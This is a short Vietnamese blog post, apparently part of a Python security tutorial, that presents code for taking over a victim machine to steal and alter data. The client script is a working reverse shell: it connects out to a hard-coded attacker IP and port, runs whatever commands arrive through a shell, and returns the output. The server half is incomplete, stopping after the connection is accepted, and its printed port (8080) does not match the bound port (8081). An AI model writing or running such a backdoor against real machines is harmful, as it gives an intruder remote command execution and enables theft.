Th2 112019
 

Ví dụ này demo lại quá trình tấn công vào máy nạn nhân và thực hiện các câu lệnh như: ipconfig, dir … nhằm mục đích đánh cắp và thay đổi thông tin.

Client

# Python For Security Pycon.vn
# Email: khanhnn@pythonvietnam.info
# Basic TCP Client
import socket                     # For Building TCP Connection
import subprocess                 # To start the shell in the system
def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        # start a socket object 's' 
    s.connect(('172.16.12.95', 8081))                            # Here we define the Attacker IP and the listening port
 
    while True:                                                 # keep receiving commands from the Kali machine
        command =  s.recv(1024)                                 # read the first KB of the tcp socket
        
        if 'terminate' in command:                  # if we got termiante order from the attacker, close the socket and break the loop
            s.close()
            break 
        
        else:                                      # otherwise, we pass the received command to a shell process
            
            CMD =  subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( CMD.stdout.read()  ) # send back the result
            s.send( CMD.stderr.read()  ) # send back the error -if any-, such as syntax error

def main ():
    connect()
main()

Server

# Python For Security Pycon.vn
# Email: khanhnn@pythonvietnam.info
# Simple TCP Server 
import socket    # For Building TCP Connection

def connect():
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # start a socket object 's'
    
    s.bind(("172.16.12.95", 8081))                           # define the kali IP and the listening port
    
    s.listen(1)                                             # define the backlog size, since we are expecting a single connection from a single
                                                            # target we will listen to one connection
    
    print '[+] Listening for incoming TCP connection on port 8080'
    
    conn, addr = s.accept()     # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source
                                # port in a tuple format (IP,port)
    

Chúc các bạn thành công !